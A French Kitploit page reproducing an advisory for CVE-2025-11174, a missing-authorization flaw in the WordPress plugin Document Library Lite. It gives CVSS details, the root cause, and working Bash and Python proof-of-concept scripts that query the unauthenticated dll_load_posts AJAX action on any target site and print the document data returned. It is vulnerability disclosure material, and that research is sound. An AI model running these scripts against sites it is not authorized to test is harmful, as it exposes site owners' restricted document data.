Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Autorisation manquante conduisant à l'exposition d'informations sensibles | CVE-2025-11174 | Kitploit
Outils/GitHubGitHub/snailsploit/cve-2025-11174
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Autorisation manquante conduisant à l'exposition d'informations sensibles | CVE-2025-11174

Voir le dépôt
4il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-11174 : Divulgation d'informations non authentifiée dans le plugin WordPress Document Library Lite

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Mots-clés : CVE-2025-11174, vulnérabilité Document Library Lite, divulgation d'informations, sécurité WordPress, exploit AJAX non authentifié, vulnérabilité de plugin WordPress, CWE-862, sécurité du plugin document WordPress, contournement d'autorisation, WordPress CVE 2025

Table des matières

  • Vue d'ensemble
  • Détails de la vulnérabilité
  • Analyse technique
  • Vecteur d'attaque
  • Preuve de concept
  • Guide de remédiation
  • Détection
  • Métriques CVSS
  • Références
  • Crédits
  • Contact sécurité

Vue d'ensemble

Vulnérabilité de divulgation d'informations du plugin WordPress Document Library Lite (CVE-2025-11174) - Faille de sécurité permettant un accès non authentifié à des données sensibles de documents dans le plugin de bibliothèque de documents WordPress.

Une vulnérabilité critique de contournement d'autorisation a été découverte dans le plugin WordPress Document Library Lite qui permet à des attaquants non authentifiés d'accéder à des informations sensibles sur les documents sans authentification appropriée.

Découvert par : Kai Aizen & Avraham Shemesh (SnailSploit)
Publié : 1er novembre 2025
Score CVSS : 5.3 (Moyen)
CWE : CWE-862 - Autorisation manquante
Plugin : Document Library Lite
Éditeur : Barn2 Plugins
Type d'attaque : Divulgation d'informations non authentifiée
Privilèges requis : Aucun (Attaque non authentifiée)

Détails de la vulnérabilité

Description

Le plugin Document Library Lite pour WordPress contient une vulnérabilité d'autorisation incorrecte dans toutes les versions jusqu'à la version 1.1.6 incluse. Le plugin expose une action AJAX non authentifiée dll_load_posts qui renvoie un tableau JSON des données des documents sans effectuer de vérifications de nonce ou de capacités.

Impact

Cette vulnérabilité permet à des attaquants non authentifiés de :

  • Accéder aux métadonnées des documents sans autorisation
  • Récupérer des listes de documents qui devraient être restreintes
  • Consulter des informations sur les documents destinées uniquement aux utilisateurs authentifiés
  • Énumérer les documents stockés dans la bibliothèque de documents

Note : Le score CVSS de 5.3 (gravité moyenne) reflète une divulgation d'informations limitée. Bien que la vulnérabilité permette un accès non authentifié aux données des documents, l'impact est évalué comme Faible pour la confidentialité, sans impact sur l'intégrité ou la disponibilité.

Versions affectées

  • Vulnérable : Toutes les versions ≤ 1.1.6
  • Corrigée : Version 1.1.7 et supérieures

Métriques CVSS v3.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
MétriqueValeur
Vecteur d'attaqueRéseau (AV:N)
Complexité de l'attaqueFaible (AC:L)
Privilèges requisAucun (PR:N)
Interaction utilisateurAucune (UI:N)
PérimètreInchangé (S:U)
ConfidentialitéFaible (C:L)
IntégritéAucun (I:N)
DisponibilitéAucun (A:N)

Détail CVSS v3.1 :

  • Vecteur d'attaque (AV) : Réseau – La vulnérabilité peut être exploitée à distance via un réseau
  • Complexité de l'attaque (AC) : Faible – Aucune condition particulière n'est requise pour l'exploitation
  • Privilèges requis (PR) : Aucun – Aucune authentification ou privilège n'est requis
  • Interaction utilisateur (UI) : Aucune – L'exploit fonctionne sans aucune interaction utilisateur
  • Périmètre (S) : Inchangé – La vulnérabilité n'affecte que le composant vulnérable
  • Impact sur la confidentialité (C) : Faible – Divulgation d'informations limitée
  • Impact sur l'intégrité (I) : Aucun – Aucun impact sur l'intégrité
  • Impact sur la disponibilité (A) : Aucun – Aucun impact sur la disponibilité

Analyse technique

Cause racine de la vulnérabilité

L'action AJAX dll_load_posts est enregistrée sans vérification d'authentification ou d'autorisation appropriée :

// Code vulnérable (simplifié)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

Le préfixe wp_ajax_nopriv_ indique que cette action est accessible aux utilisateurs non authentifiés, et la fonction de callback n'implémente pas :

  • Vérification de nonce
  • Vérification des capacités
  • Validation de l'authentification de l'utilisateur

Vecteur d'attaque

POST /wp-admin/admin-ajax.php
action=dll_load_posts

La vulnérabilité peut être exploitée via le point de terminaison admin-ajax.php de WordPress sans authentification.

Preuve de concept

⚠️ À des fins éducatives et de tests autorisés uniquement

PoC en Bash

#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

PoC en Python

#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

Remédiation

Pour les administrateurs de sites

Action immédiate requise :

Télécharger l’outil